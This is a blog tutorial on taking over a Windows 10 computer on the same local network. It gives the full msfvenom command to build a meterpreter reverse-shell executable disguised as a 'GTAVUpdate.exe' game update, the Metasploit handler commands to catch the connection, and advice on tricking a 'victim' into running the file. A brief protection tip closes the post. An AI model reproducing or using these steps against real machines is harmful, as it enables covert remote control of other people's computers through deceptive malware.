In this post I’ll be teaching you how to hack Windows over the LAN (local area network) ; i.e. our victim is connected to the same network (hotspot/WiFi router)

Windows 10 needs to have the Windows Defender Firewall disabled. In this tutorial we will not cover Shellter to make the .exe FUD (Fully Undetectable) that’s why we need to disabled it.

SO LETS GET STARTED !

Step 1 : Generate a payload using msfvenom

Before launching the metasploit, we need to figure out what is our Kali Linux local IP.

For that, run “`ip addr“` or “`ifconfig“`

Our local/private ip address is 192.168.195.72

Now let’s get hands dirty!

In the terminal run the follow command:

msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST=192.168.195.72 LPORT=4444 -o /root/Desktop/GTAVUpdate.exe

The command above instructs msfvenom to generate a 32-bit Windows executable file that implements a reverse TCP connection for the payload. The format must be specified as being type .exe, and the local host (LHOST) and local port (LPORT) have to be defined. In our case, the LHOST is the IP address of our attacking Kali Linux machine that we got in the last command, and the LPORT is the port to listen on for a connection from the target once it has been compromised.

The name of the .exe is up to you. In this case I’ll be using GTAVUpdate.exe because our target will be a gamer and that we know he has GTA V.

Step 2 : Launch the Metasploit Framework

Launch the Metasploit using the command msfconsole on the Kali Linux terminal.

Step 3 : Start reverse TCP handler

The screenshot below shows what commands to issue within Metasploit. First, we’ll tell Metasploit to use the generic payload handler “multi/handler” using the command “`use multi/handler“`. We will then set the payload to match the one set within the executable using the command “`set payload windows/meterpreter/reverse_tcp“`. We will then set the LHOST and LPORT this way — “`set LHOST 192.168.195.72“` and set “`LPORT 4444“`. Once done, type “`run“` or “`exploit“`and press Enter.

You can use show options to check if everything’s ok as shown below :

If everything’s ok type run or exploit as shown below :

Step 4 : Social Engineering

Now you need to do some social engineering in order to make the user execute the program.

For this tutorial we will simply host the .exe on apache2 and transfer it on the Windows Machine as shown below :

On the Windows machine you just need to access via the browser the IP/File.exe as shown below :

In our case is 192.168.192.72/GTAVUpdate.exe

Now run the GTAVUpdate.exe file on your victim’s computer and check the connection on your KALI machine.

As you can see we are now connected to the victim machine.

Now we can do a hell lot of things.

Now you have access to the victim machine, type “help” ,then go ahead and try out the various other functions of the meterpreter payload!!!

How to Protect

For this type of attacks the most important thing is to have the Firewall enabled. Windows Defender makes a good job protecting files like this.

Dont’ forget to keep your Windows always updated and also don’t execute programs that you don’t know for sure that are original and signed.

Hope you enjoyed. 🙂

If u face any kind of issue or need some help in it’s additional features,feel free to leave a comment or directly connect with me on my Instagram handle,my mail or my WhatsApp group…..details of which are mentioned on my home page 🤗

daNiN hacking Tutorials

19 November 2021

Recent Posts

Categories

Contact Form